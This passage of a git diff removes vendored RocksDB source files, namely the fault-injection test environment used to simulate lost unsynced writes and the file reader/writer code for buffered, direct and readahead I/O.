-  if (s.ok()) {
-    UntrackFile(f);
-  }
-  return s;
-}
-
-Status FaultInjectionTestEnv::RenameFile(const std::string& s,
-                                         const std::string& t) {
-  if (!IsFilesystemActive()) {
-    return Status::Corruption("Not Active");
-  }
-  Status ret = EnvWrapper::RenameFile(s, t);
-
-  if (ret.ok()) {
-    MutexLock l(&mutex_);
-    if (db_file_state_.find(s) != db_file_state_.end()) {
-      db_file_state_[t] = db_file_state_[s];
-      db_file_state_.erase(s);
-    }
-
-    auto sdn = GetDirAndName(s);
-    auto tdn = GetDirAndName(t);
-    if (dir_to_new_files_since_last_sync_[sdn.first].erase(sdn.second) != 0) {
-      auto& tlist = dir_to_new_files_since_last_sync_[tdn.first];
-      assert(tlist.find(tdn.second) == tlist.end());
-      tlist.insert(tdn.second);
-    }
-  }
-
-  return ret;
-}
-
-void FaultInjectionTestEnv::WritableFileClosed(const FileState& state) {
-  MutexLock l(&mutex_);
-  if (open_files_.find(state.filename_) != open_files_.end()) {
-    db_file_state_[state.filename_] = state;
-    open_files_.erase(state.filename_);
-  }
-}
-
-// For every file that is not fully synced, make a call to `func` with
-// FileState of the file as the parameter.
-Status FaultInjectionTestEnv::DropFileData(
-    std::function<Status(Env*, FileState)> func) {
-  Status s;
-  MutexLock l(&mutex_);
-  for (std::map<std::string, FileState>::const_iterator it =
-           db_file_state_.begin();
-       s.ok() && it != db_file_state_.end(); ++it) {
-    const FileState& state = it->second;
-    if (!state.IsFullySynced()) {
-      s = func(target(), state);
-    }
-  }
-  return s;
-}
-
-Status FaultInjectionTestEnv::DropUnsyncedFileData() {
-  return DropFileData([&](Env* env, const FileState& state) {
-    return state.DropUnsyncedData(env);
-  });
-}
-
-Status FaultInjectionTestEnv::DropRandomUnsyncedFileData(Random* rnd) {
-  return DropFileData([&](Env* env, const FileState& state) {
-    return state.DropRandomUnsyncedData(env, rnd);
-  });
-}
-
-Status FaultInjectionTestEnv::DeleteFilesCreatedAfterLastDirSync() {
-  // Because DeleteFile access this container make a copy to avoid deadlock
-  std::map<std::string, std::set<std::string>> map_copy;
-  {
-    MutexLock l(&mutex_);
-    map_copy.insert(dir_to_new_files_since_last_sync_.begin(),
-                    dir_to_new_files_since_last_sync_.end());
-  }
-
-  for (auto& pair : map_copy) {
-    for (std::string name : pair.second) {
-      Status s = DeleteFile(pair.first + "/" + name);
-      if (!s.ok()) {
-        return s;
-      }
-    }
-  }
-  return Status::OK();
-}
-void FaultInjectionTestEnv::ResetState() {
-  MutexLock l(&mutex_);
-  db_file_state_.clear();
-  dir_to_new_files_since_last_sync_.clear();
-  SetFilesystemActiveNoLock(true);
-}
-
-void FaultInjectionTestEnv::UntrackFile(const std::string& f) {
-  MutexLock l(&mutex_);
-  auto dir_and_name = GetDirAndName(f);
-  dir_to_new_files_since_last_sync_[dir_and_name.first].erase(
-      dir_and_name.second);
-  db_file_state_.erase(f);
-  open_files_.erase(f);
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/fault_injection_test_env.h b/thirdparty/rocksdb/util/fault_injection_test_env.h
deleted file mode 100644
index 5d0ae63..0000000
--- a/thirdparty/rocksdb/util/fault_injection_test_env.h
+++ /dev/null
@@ -1,159 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright 2014 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// This test uses a custom Env to keep track of the state of a filesystem as of
-// the last "sync". It then checks for data loss errors by purposely dropping
-// file data (or entire files) not protected by a "sync".
-
-#ifndef UTIL_FAULT_INJECTION_TEST_ENV_H_
-#define UTIL_FAULT_INJECTION_TEST_ENV_H_
-
-#include <map>
-#include <set>
-#include <string>
-
-#include "db/version_set.h"
-#include "env/mock_env.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-class TestWritableFile;
-class FaultInjectionTestEnv;
-
-struct FileState {
-  std::string filename_;
-  ssize_t pos_;
-  ssize_t pos_at_last_sync_;
-  ssize_t pos_at_last_flush_;
-
-  explicit FileState(const std::string& filename)
-      : filename_(filename),
-        pos_(-1),
-        pos_at_last_sync_(-1),
-        pos_at_last_flush_(-1) {}
-
-  FileState() : pos_(-1), pos_at_last_sync_(-1), pos_at_last_flush_(-1) {}
-
-  bool IsFullySynced() const { return pos_ <= 0 || pos_ == pos_at_last_sync_; }
-
-  Status DropUnsyncedData(Env* env) const;
-
-  Status DropRandomUnsyncedData(Env* env, Random* rand) const;
-};
-
-// A wrapper around WritableFileWriter* file
-// is written to or sync'ed.
-class TestWritableFile : public WritableFile {
- public:
-  explicit TestWritableFile(const std::string& fname,
-                            unique_ptr<WritableFile>&& f,
-                            FaultInjectionTestEnv* env);
-  virtual ~TestWritableFile();
-  virtual Status Append(const Slice& data) override;
-  virtual Status Truncate(uint64_t size) override {
-    return target_->Truncate(size);
-  }
-  virtual Status Close() override;
-  virtual Status Flush() override;
-  virtual Status Sync() override;
-  virtual bool IsSyncThreadSafe() const override { return true; }
-
- private:
-  FileState state_;
-  unique_ptr<WritableFile> target_;
-  bool writable_file_opened_;
-  FaultInjectionTestEnv* env_;
-};
-
-class TestDirectory : public Directory {
- public:
-  explicit TestDirectory(FaultInjectionTestEnv* env, std::string dirname,
-                         Directory* dir)
-      : env_(env), dirname_(dirname), dir_(dir) {}
-  ~TestDirectory() {}
-
-  virtual Status Fsync() override;
-
- private:
-  FaultInjectionTestEnv* env_;
-  std::string dirname_;
-  unique_ptr<Directory> dir_;
-};
-
-class FaultInjectionTestEnv : public EnvWrapper {
- public:
-  explicit FaultInjectionTestEnv(Env* base)
-      : EnvWrapper(base), filesystem_active_(true) {}
-  virtual ~FaultInjectionTestEnv() {}
-
-  Status NewDirectory(const std::string& name,
-                      unique_ptr<Directory>* result) override;
-
-  Status NewWritableFile(const std::string& fname,
-                         unique_ptr<WritableFile>* result,
-                         const EnvOptions& soptions) override;
-
-  virtual Status DeleteFile(const std::string& f) override;
-
-  virtual Status RenameFile(const std::string& s,
-                            const std::string& t) override;
-
-  void WritableFileClosed(const FileState& state);
-
-  // For every file that is not fully synced, make a call to `func` with
-  // FileState of the file as the parameter.
-  Status DropFileData(std::function<Status(Env*, FileState)> func);
-
-  Status DropUnsyncedFileData();
-
-  Status DropRandomUnsyncedFileData(Random* rnd);
-
-  Status DeleteFilesCreatedAfterLastDirSync();
-
-  void ResetState();
-
-  void UntrackFile(const std::string& f);
-
-  void SyncDir(const std::string& dirname) {
-    MutexLock l(&mutex_);
-    dir_to_new_files_since_last_sync_.erase(dirname);
-  }
-
-  // Setting the filesystem to inactive is the test equivalent to simulating a
-  // system reset. Setting to inactive will freeze our saved filesystem state so
-  // that it will stop being recorded. It can then be reset back to the state at
-  // the time of the reset.
-  bool IsFilesystemActive() {
-    MutexLock l(&mutex_);
-    return filesystem_active_;
-  }
-  void SetFilesystemActiveNoLock(bool active) { filesystem_active_ = active; }
-  void SetFilesystemActive(bool active) {
-    MutexLock l(&mutex_);
-    SetFilesystemActiveNoLock(active);
-  }
-  void AssertNoOpenFile() { assert(open_files_.empty()); }
-
- private:
-  port::Mutex mutex_;
-  std::map<std::string, FileState> db_file_state_;
-  std::set<std::string> open_files_;
-  std::unordered_map<std::string, std::set<std::string>>
-      dir_to_new_files_since_last_sync_;
-  bool filesystem_active_;  // Record flushes, syncs, writes
-};
-
-}  // namespace rocksdb
-
-#endif  // UTIL_FAULT_INJECTION_TEST_ENV_H_
diff --git a/thirdparty/rocksdb/util/file_reader_writer.cc b/thirdparty/rocksdb/util/file_reader_writer.cc
deleted file mode 100644
index f46b78f..0000000
--- a/thirdparty/rocksdb/util/file_reader_writer.cc
+++ /dev/null
@@ -1,649 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/file_reader_writer.h"
-
-#include <algorithm>
-#include <mutex>
-
-#include "monitoring/histogram.h"
-#include "monitoring/iostats_context_imp.h"
-#include "port/port.h"
-#include "util/random.h"
-#include "util/rate_limiter.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-#ifndef NDEBUG
-namespace {
-bool IsFileSectorAligned(const size_t off, size_t sector_size) {
-  return off % sector_size == 0;
-}
-}
-#endif
-
-Status SequentialFileReader::Read(size_t n, Slice* result, char* scratch) {
-  Status s;
-  if (use_direct_io()) {
-#ifndef ROCKSDB_LITE
-    size_t offset = offset_.fetch_add(n);
-    size_t alignment = file_->GetRequiredBufferAlignment();
-    size_t aligned_offset = TruncateToPageBoundary(alignment, offset);
-    size_t offset_advance = offset - aligned_offset;
-    size_t size = Roundup(offset + n, alignment) - aligned_offset;
-    size_t r = 0;
-    AlignedBuffer buf;
-    buf.Alignment(alignment);
-    buf.AllocateNewBuffer(size);
-    Slice tmp;
-    s = file_->PositionedRead(aligned_offset, size, &tmp, buf.BufferStart());
-    if (s.ok() && offset_advance < tmp.size()) {
-      buf.Size(tmp.size());
-      r = buf.Read(scratch, offset_advance,
-                   std::min(tmp.size() - offset_advance, n));
-    }
-    *result = Slice(scratch, r);
-#endif  // !ROCKSDB_LITE
-  } else {
-    s = file_->Read(n, result, scratch);
-  }
-  IOSTATS_ADD(bytes_read, result->size());
-  return s;
-}
-
-
-Status SequentialFileReader::Skip(uint64_t n) {
-#ifndef ROCKSDB_LITE
-  if (use_direct_io()) {
-    offset_ += n;
-    return Status::OK();
-  }
-#endif  // !ROCKSDB_LITE
-  return file_->Skip(n);
-}
-
-Status RandomAccessFileReader::Read(uint64_t offset, size_t n, Slice* result,
-                                    char* scratch) const {
-  Status s;
-  uint64_t elapsed = 0;
-  {
-    StopWatch sw(env_, stats_, hist_type_,
-                 (stats_ != nullptr) ? &elapsed : nullptr);
-    IOSTATS_TIMER_GUARD(read_nanos);
-    if (use_direct_io()) {
-#ifndef ROCKSDB_LITE
-      size_t alignment = file_->GetRequiredBufferAlignment();
-      size_t aligned_offset = TruncateToPageBoundary(alignment, offset);
-      size_t offset_advance = offset - aligned_offset;
-      size_t read_size = Roundup(offset + n, alignment) - aligned_offset;
-      AlignedBuffer buf;
-      buf.Alignment(alignment);
-      buf.AllocateNewBuffer(read_size);
-      while (buf.CurrentSize() < read_size) {
-        size_t allowed;
-        if (rate_limiter_ != nullptr) {
-          allowed = rate_limiter_->RequestToken(
-              buf.Capacity() - buf.CurrentSize(), buf.Alignment(),
-              Env::IOPriority::IO_LOW, stats_, RateLimiter::OpType::kRead);
-        } else {
-          assert(buf.CurrentSize() == 0);
-          allowed = read_size;
-        }
-        Slice tmp;
-        s = file_->Read(aligned_offset + buf.CurrentSize(), allowed, &tmp,
-                        buf.Destination());
-        buf.Size(buf.CurrentSize() + tmp.size());
-        if (!s.ok() || tmp.size() < allowed) {
-          break;
-        }
-      }
-      size_t res_len = 0;
-      if (s.ok() && offset_advance < buf.CurrentSize()) {
-        res_len = buf.Read(scratch, offset_advance,
-                           std::min(buf.CurrentSize() - offset_advance, n));
-      }
-      *result = Slice(scratch, res_len);
-#endif  // !ROCKSDB_LITE
-    } else {
-      size_t pos = 0;
-      const char* res_scratch = nullptr;
-      while (pos < n) {
-        size_t allowed;
-        if (for_compaction_ && rate_limiter_ != nullptr) {
-          allowed = rate_limiter_->RequestToken(n - pos, 0 /* alignment */,
-                                                Env::IOPriority::IO_LOW, stats_,
-                                                RateLimiter::OpType::kRead);
-        } else {
-          allowed = n;
-        }
-        Slice tmp_result;
-        s = file_->Read(offset + pos, allowed, &tmp_result, scratch + pos);
-        if (res_scratch == nullptr) {
-          // we can't simply use `scratch` because reads of mmap'd files return
-          // data in a different buffer.
-          res_scratch = tmp_result.data();
-        } else {
-          // make sure chunks are inserted contiguously into `res_scratch`.
-          assert(tmp_result.data() == res_scratch + pos);
-        }
-        pos += tmp_result.size();
-        if (!s.ok() || tmp_result.size() < allowed) {
-          break;
-        }
-      }
-      *result = Slice(res_scratch, s.ok() ? pos : 0);
-    }
-    IOSTATS_ADD_IF_POSITIVE(bytes_read, result->size());
-  }
-  if (stats_ != nullptr && file_read_hist_ != nullptr) {
-    file_read_hist_->Add(elapsed);
-  }
-  return s;
-}
-
-Status WritableFileWriter::Append(const Slice& data) {
-  const char* src = data.data();
-  size_t left = data.size();
-  Status s;
-  pending_sync_ = true;
-
-  TEST_KILL_RANDOM("WritableFileWriter::Append:0",
-                   rocksdb_kill_odds * REDUCE_ODDS2);
-
-  {
-    IOSTATS_TIMER_GUARD(prepare_write_nanos);
-    TEST_SYNC_POINT("WritableFileWriter::Append:BeforePrepareWrite");
-    writable_file_->PrepareWrite(static_cast<size_t>(GetFileSize()), left);
-  }
-
-  // See whether we need to enlarge the buffer to avoid the flush
-  if (buf_.Capacity() - buf_.CurrentSize() < left) {
-    for (size_t cap = buf_.Capacity();
-         cap < max_buffer_size_;  // There is still room to increase
-         cap *= 2) {
-      // See whether the next available size is large enough.
-      // Buffer will never be increased to more than max_buffer_size_.
-      size_t desired_capacity = std::min(cap * 2, max_buffer_size_);
-      if (desired_capacity - buf_.CurrentSize() >= left ||
-          (use_direct_io() && desired_capacity == max_buffer_size_)) {
-        buf_.AllocateNewBuffer(desired_capacity, true);
-        break;
-      }
-    }
-  }
-
-  // Flush only when buffered I/O
-  if (!use_direct_io() && (buf_.Capacity() - buf_.CurrentSize()) < left) {
-    if (buf_.CurrentSize() > 0) {
-      s = Flush();
-      if (!s.ok()) {
-        return s;
-      }
-    }
-    assert(buf_.CurrentSize() == 0);
-  }
-
-  // We never write directly to disk with direct I/O on.
-  // or we simply use it for its original purpose to accumulate many small
-  // chunks
-  if (use_direct_io() || (buf_.Capacity() >= left)) {
-    while (left > 0) {
-      size_t appended = buf_.Append(src, left);
-      left -= appended;
-      src += appended;
-
-      if (left > 0) {
-        s = Flush();
-        if (!s.ok()) {
-          break;
-        }
-      }
-    }
-  } else {
-    // Writing directly to file bypassing the buffer
-    assert(buf_.CurrentSize() == 0);
-    s = WriteBuffered(src, left);
-  }
-
-  TEST_KILL_RANDOM("WritableFileWriter::Append:1", rocksdb_kill_odds);
-  if (s.ok()) {
-    filesize_ += data.size();
-  }
-  return s;
-}
-
-Status WritableFileWriter::Close() {
-
-  // Do not quit immediately on failure the file MUST be closed
-  Status s;
-
-  // Possible to close it twice now as we MUST close
-  // in __dtor, simply flushing is not enough
-  // Windows when pre-allocating does not fill with zeros
-  // also with unbuffered access we also set the end of data.
-  if (!writable_file_) {
-    return s;
-  }
-
-  s = Flush();  // flush cache to OS
-
-  Status interim;
-  // In direct I/O mode we write whole pages so
-  // we need to let the file know where data ends.
-  if (use_direct_io()) {
-    interim = writable_file_->Truncate(filesize_);
-    if (!interim.ok() && s.ok()) {
-      s = interim;
-    }
-  }
-
-  TEST_KILL_RANDOM("WritableFileWriter::Close:0", rocksdb_kill_odds);
-  interim = writable_file_->Close();
-  if (!interim.ok() && s.ok()) {
-    s = interim;
-  }
-
-  writable_file_.reset();
-  TEST_KILL_RANDOM("WritableFileWriter::Close:1", rocksdb_kill_odds);
-
-  return s;
-}
-
-// write out the cached data to the OS cache or storage if direct I/O
-// enabled
-Status WritableFileWriter::Flush() {
-  Status s;
-  TEST_KILL_RANDOM("WritableFileWriter::Flush:0",
-                   rocksdb_kill_odds * REDUCE_ODDS2);
-
-  if (buf_.CurrentSize() > 0) {
-    if (use_direct_io()) {
-#ifndef ROCKSDB_LITE
-      s = WriteDirect();
-#endif  // !ROCKSDB_LITE
-    } else {
-      s = WriteBuffered(buf_.BufferStart(), buf_.CurrentSize());
-    }
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  s = writable_file_->Flush();
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  // sync OS cache to disk for every bytes_per_sync_
-  // TODO: give log file and sst file different options (log
-  // files could be potentially cached in OS for their whole
-  // life time, thus we might not want to flush at all).
-
-  // We try to avoid sync to the last 1MB of data. For two reasons:
-  // (1) avoid rewrite the same page that is modified later.
-  // (2) for older version of OS, write can block while writing out
-  //     the page.
-  // Xfs does neighbor page flushing outside of the specified ranges. We
-  // need to make sure sync range is far from the write offset.
-  if (!use_direct_io() && bytes_per_sync_) {
-    const uint64_t kBytesNotSyncRange = 1024 * 1024;  // recent 1MB is not synced.
-    const uint64_t kBytesAlignWhenSync = 4 * 1024;    // Align 4KB.
-    if (filesize_ > kBytesNotSyncRange) {
-      uint64_t offset_sync_to = filesize_ - kBytesNotSyncRange;
-      offset_sync_to -= offset_sync_to % kBytesAlignWhenSync;
-      assert(offset_sync_to >= last_sync_size_);
-      if (offset_sync_to > 0 &&
-          offset_sync_to - last_sync_size_ >= bytes_per_sync_) {
-        s = RangeSync(last_sync_size_, offset_sync_to - last_sync_size_);
-        last_sync_size_ = offset_sync_to;
-      }
-    }
-  }
-
-  return s;
-}
-
-Status WritableFileWriter::Sync(bool use_fsync) {
-  Status s = Flush();
-  if (!s.ok()) {
-    return s;
-  }
-  TEST_KILL_RANDOM("WritableFileWriter::Sync:0", rocksdb_kill_odds);
-  if (!use_direct_io() && pending_sync_) {
-    s = SyncInternal(use_fsync);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-  TEST_KILL_RANDOM("WritableFileWriter::Sync:1", rocksdb_kill_odds);
-  pending_sync_ = false;
-  return Status::OK();
-}
-
-Status WritableFileWriter::SyncWithoutFlush(bool use_fsync) {
-  if (!writable_file_->IsSyncThreadSafe()) {
-    return Status::NotSupported(
-      "Can't WritableFileWriter::SyncWithoutFlush() because "
-      "WritableFile::IsSyncThreadSafe() is false");
-  }
-  TEST_SYNC_POINT("WritableFileWriter::SyncWithoutFlush:1");
-  Status s = SyncInternal(use_fsync);
-  TEST_SYNC_POINT("WritableFileWriter::SyncWithoutFlush:2");
-  return s;
-}
-
-Status WritableFileWriter::SyncInternal(bool use_fsync) {
-  Status s;
-  IOSTATS_TIMER_GUARD(fsync_nanos);
-  TEST_SYNC_POINT("WritableFileWriter::SyncInternal:0");
-  if (use_fsync) {
-    s = writable_file_->Fsync();
-  } else {
-    s = writable_file_->Sync();
-  }
-  return s;
-}
-
-Status WritableFileWriter::RangeSync(uint64_t offset, uint64_t nbytes) {
-  IOSTATS_TIMER_GUARD(range_sync_nanos);
-  TEST_SYNC_POINT("WritableFileWriter::RangeSync:0");
-  return writable_file_->RangeSync(offset, nbytes);
-}
-
-// This method writes to disk the specified data and makes use of the rate
-// limiter if available
-Status WritableFileWriter::WriteBuffered(const char* data, size_t size) {
-  Status s;
-  assert(!use_direct_io());
-  const char* src = data;
-  size_t left = size;
-
-  while (left > 0) {
-    size_t allowed;
-    if (rate_limiter_ != nullptr) {
-      allowed = rate_limiter_->RequestToken(
-          left, 0 /* alignment */, writable_file_->GetIOPriority(), stats_,
-          RateLimiter::OpType::kWrite);
-    } else {
-      allowed = left;
-    }
-
-    {
-      IOSTATS_TIMER_GUARD(write_nanos);
-      TEST_SYNC_POINT("WritableFileWriter::Flush:BeforeAppend");
-      s = writable_file_->Append(Slice(src, allowed));
-      if (!s.ok()) {
-        return s;
-      }
-    }
-
-    IOSTATS_ADD(bytes_written, allowed);
-    TEST_KILL_RANDOM("WritableFileWriter::WriteBuffered:0", rocksdb_kill_odds);
-
-    left -= allowed;
-    src += allowed;
-  }
-  buf_.Size(0);
-  return s;
-}
-
-
-// This flushes the accumulated data in the buffer. We pad data with zeros if
-// necessary to the whole page.
-// However, during automatic flushes padding would not be necessary.
-// We always use RateLimiter if available. We move (Refit) any buffer bytes
-// that are left over the
-// whole number of pages to be written again on the next flush because we can
-// only write on aligned
-// offsets.
-#ifndef ROCKSDB_LITE
-Status WritableFileWriter::WriteDirect() {
-  assert(use_direct_io());
-  Status s;
-  const size_t alignment = buf_.Alignment();
-  assert((next_write_offset_ % alignment) == 0);
-
-  // Calculate whole page final file advance if all writes succeed
-  size_t file_advance =
-    TruncateToPageBoundary(alignment, buf_.CurrentSize());
-
-  // Calculate the leftover tail, we write it here padded with zeros BUT we
-  // will write
-  // it again in the future either on Close() OR when the current whole page
-  // fills out
-  size_t leftover_tail = buf_.CurrentSize() - file_advance;
-
-  // Round up and pad
-  buf_.PadToAlignmentWith(0);
-
-  const char* src = buf_.BufferStart();
-  uint64_t write_offset = next_write_offset_;
-  size_t left = buf_.CurrentSize();
-
-  while (left > 0) {
-    // Check how much is allowed
-    size_t size;
-    if (rate_limiter_ != nullptr) {
-      size = rate_limiter_->RequestToken(left, buf_.Alignment(),
-                                         writable_file_->GetIOPriority(),
-                                         stats_, RateLimiter::OpType::kWrite);
-    } else {
-      size = left;
-    }
-
-    {
-      IOSTATS_TIMER_GUARD(write_nanos);
-      TEST_SYNC_POINT("WritableFileWriter::Flush:BeforeAppend");
-      // direct writes must be positional
-      s = writable_file_->PositionedAppend(Slice(src, size), write_offset);
-      if (!s.ok()) {
-        buf_.Size(file_advance + leftover_tail);
-        return s;
-      }
-    }
-
-    IOSTATS_ADD(bytes_written, size);
-    left -= size;
-    src += size;
-    write_offset += size;
-    assert((next_write_offset_ % alignment) == 0);
-  }
-
-  if (s.ok()) {
-    // Move the tail to the beginning of the buffer
-    // This never happens during normal Append but rather during
-    // explicit call to Flush()/Sync() or Close()
-    buf_.RefitTail(file_advance, leftover_tail);
-    // This is where we start writing next time which may or not be
-    // the actual file size on disk. They match if the buffer size
-    // is a multiple of whole pages otherwise filesize_ is leftover_tail
-    // behind
-    next_write_offset_ += file_advance;
-  }
-  return s;
-}
-#endif  // !ROCKSDB_LITE
-
-namespace {
-class ReadaheadRandomAccessFile : public RandomAccessFile {
- public:
-  ReadaheadRandomAccessFile(std::unique_ptr<RandomAccessFile>&& file,
-                            size_t readahead_size)
-      : file_(std::move(file)),
-        alignment_(file_->GetRequiredBufferAlignment()),
-        readahead_size_(Roundup(readahead_size, alignment_)),
-        buffer_(),
-        buffer_offset_(0),
-        buffer_len_(0) {
-
-    buffer_.Alignment(alignment_);
-    buffer_.AllocateNewBuffer(readahead_size_);
-  }
-
- ReadaheadRandomAccessFile(const ReadaheadRandomAccessFile&) = delete;
-
- ReadaheadRandomAccessFile& operator=(const ReadaheadRandomAccessFile&) = delete;
-
-  virtual Status Read(uint64_t offset, size_t n, Slice* result,
-                      char* scratch) const override {
-
-    if (n + alignment_ >= readahead_size_) {
-      return file_->Read(offset, n, result, scratch);
-    }
-
-    std::unique_lock<std::mutex> lk(lock_);
-
-    size_t cached_len = 0;
-    // Check if there is a cache hit, means that [offset, offset + n) is either
-    // completely or partially in the buffer
-    // If it's completely cached, including end of file case when offset + n is
-    // greater than EOF, return
-    if (TryReadFromCache(offset, n, &cached_len, scratch) &&
-        (cached_len == n ||
-         // End of file
-         buffer_len_ < readahead_size_)) {
-      *result = Slice(scratch, cached_len);
-      return Status::OK();
-    }
-    size_t advanced_offset = offset + cached_len;
-    // In the case of cache hit advanced_offset is already aligned, means that
-    // chunk_offset equals to advanced_offset
-    size_t chunk_offset = TruncateToPageBoundary(alignment_, advanced_offset);
-    Slice readahead_result;
-
-    Status s = ReadIntoBuffer(chunk_offset, readahead_size_);
-    if (s.ok()) {
-      // In the case of cache miss, i.e. when cached_len equals 0, an offset can
-      // exceed the file end position, so the following check is required
-      if (advanced_offset < chunk_offset + buffer_len_) {
-        // In the case of cache miss, the first chunk_padding bytes in buffer_
-        // are
-        // stored for alignment only and must be skipped
-        size_t chunk_padding = advanced_offset - chunk_offset;
-        auto remaining_len =
-            std::min(buffer_len_ - chunk_padding, n - cached_len);
-        memcpy(scratch + cached_len, buffer_.BufferStart() + chunk_padding,
-               remaining_len);
-        *result = Slice(scratch, cached_len + remaining_len);
-      } else {
-        *result = Slice(scratch, cached_len);
-      }
-    }
-    return s;
-  }
-
-  virtual Status Prefetch(uint64_t offset, size_t n) override {
-    size_t prefetch_offset = TruncateToPageBoundary(alignment_, offset);
-    if (prefetch_offset == buffer_offset_) {
-      return Status::OK();
-    }
-    return ReadIntoBuffer(prefetch_offset,
-                          Roundup(offset + n, alignment_) - prefetch_offset);
-  }
-
-  virtual size_t GetUniqueId(char* id, size_t max_size) const override {
-    return file_->GetUniqueId(id, max_size);
-  }
-
-  virtual void Hint(AccessPattern pattern) override { file_->Hint(pattern); }
-
-  virtual Status InvalidateCache(size_t offset, size_t length) override {
-    return file_->InvalidateCache(offset, length);
-  }
-
-  virtual bool use_direct_io() const override {
-    return file_->use_direct_io();
-  }
-
- private:
-  bool TryReadFromCache(uint64_t offset, size_t n, size_t* cached_len,
-                         char* scratch) const {
-    if (offset < buffer_offset_ || offset >= buffer_offset_ + buffer_len_) {
-      *cached_len = 0;
-      return false;
-    }
-    uint64_t offset_in_buffer = offset - buffer_offset_;
-    *cached_len =
-        std::min(buffer_len_ - static_cast<size_t>(offset_in_buffer), n);
-    memcpy(scratch, buffer_.BufferStart() + offset_in_buffer, *cached_len);
-    return true;
-  }
-
-  Status ReadIntoBuffer(uint64_t offset, size_t n) const {
-    if (n > buffer_.Capacity()) {
-      n = buffer_.Capacity();
-    }
-    assert(IsFileSectorAligned(offset, alignment_));
-    assert(IsFileSectorAligned(n, alignment_));
-    Slice result;
-    Status s = file_->Read(offset, n, &result, buffer_.BufferStart());
-    if (s.ok()) {
-      buffer_offset_ = offset;
-      buffer_len_ = result.size();
-    }
-    return s;
-  }
-
-  std::unique_ptr<RandomAccessFile> file_;
-  const size_t alignment_;
-  size_t               readahead_size_;
-
-  mutable std::mutex lock_;
-  mutable AlignedBuffer buffer_;
-  mutable uint64_t buffer_offset_;
-  mutable size_t buffer_len_;
-};
-}  // namespace
-
-Status FilePrefetchBuffer::Prefetch(RandomAccessFileReader* reader,
-                                    uint64_t offset, size_t n) {
-  size_t alignment = reader->file()->GetRequiredBufferAlignment();
-  uint64_t roundup_offset = Roundup(offset, alignment);
-  uint64_t roundup_len = Roundup(n, alignment);
-  buffer_.Alignment(alignment);
-  buffer_.AllocateNewBuffer(roundup_len);
-
-  Slice result;
-  Status s =
-      reader->Read(roundup_offset, roundup_len, &result, buffer_.BufferStart());
-  if (s.ok()) {
-    buffer_offset_ = roundup_offset;
-    buffer_len_ = result.size();
-  }
-  return s;
-}
-
-bool FilePrefetchBuffer::TryReadFromCache(uint64_t offset, size_t n,
-                                          Slice* result) const {
-  if (offset < buffer_offset_ || offset + n > buffer_offset_ + buffer_len_) {
-    return false;
-  }
-  uint64_t offset_in_buffer = offset - buffer_offset_;
-  *result = Slice(buffer_.BufferStart() + offset_in_buffer, n);
-  return true;
-}
-
-std::unique_ptr<RandomAccessFile> NewReadaheadRandomAccessFile(
-    std::unique_ptr<RandomAccessFile>&& file, size_t readahead_size) {
-  std::unique_ptr<RandomAccessFile> result(
-    new ReadaheadRandomAccessFile(std::move(file), readahead_size));
-  return result;
-}
-
-Status NewWritableFile(Env* env, const std::string& fname,
-                       unique_ptr<WritableFile>* result,
-                       const EnvOptions& options) {
-  Status s = env->NewWritableFile(fname, result, options);
-  TEST_KILL_RANDOM("NewWritableFile:0", rocksdb_kill_odds * REDUCE_ODDS2);
-  return s;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/file_reader_writer.h b/thirdparty/rocksdb/util/file_reader_writer.h
deleted file mode 100644
index 9be6924..0000000
--- a/thirdparty/rocksdb/util/file_reader_writer.h
+++ /dev/null
@@ -1,213 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-#include <atomic>
-#include <string>
-#include "port/port.h"
-#include "rocksdb/env.h"
-#include "rocksdb/rate_limiter.h"
-#include "util/aligned_buffer.h"
-
-namespace rocksdb {
-
-class Statistics;
-class HistogramImpl;
-
-std::unique_ptr<RandomAccessFile> NewReadaheadRandomAccessFile(
-  std::unique_ptr<RandomAccessFile>&& file, size_t readahead_size);
-
-class SequentialFileReader {
- private:
-  std::unique_ptr<SequentialFile> file_;
-  std::atomic<size_t> offset_;  // read offset
-
- public:
-  explicit SequentialFileReader(std::unique_ptr<SequentialFile>&& _file)
-      : file_(std::move(_file)), offset_(0) {}
-
-  SequentialFileReader(SequentialFileReader&& o) ROCKSDB_NOEXCEPT {
-    *this = std::move(o);
-  }
-
-  SequentialFileReader& operator=(SequentialFileReader&& o) ROCKSDB_NOEXCEPT {
-    file_ = std::move(o.file_);
-    return *this;
-  }
-
-  SequentialFileReader(const SequentialFileReader&) = delete;
-  SequentialFileReader& operator=(const SequentialFileReader&) = delete;
-
-  Status Read(size_t n, Slice* result, char* scratch);
-
-  Status Skip(uint64_t n);
-
-  void Rewind();
-
-  SequentialFile* file() { return file_.get(); }
-
-  bool use_direct_io() const { return file_->use_direct_io(); }
-};
-
-class RandomAccessFileReader {
- private:
-  std::unique_ptr<RandomAccessFile> file_;
-  std::string     file_name_;
-  Env*            env_;
-  Statistics*     stats_;
-  uint32_t        hist_type_;
-  HistogramImpl*  file_read_hist_;
-  RateLimiter* rate_limiter_;
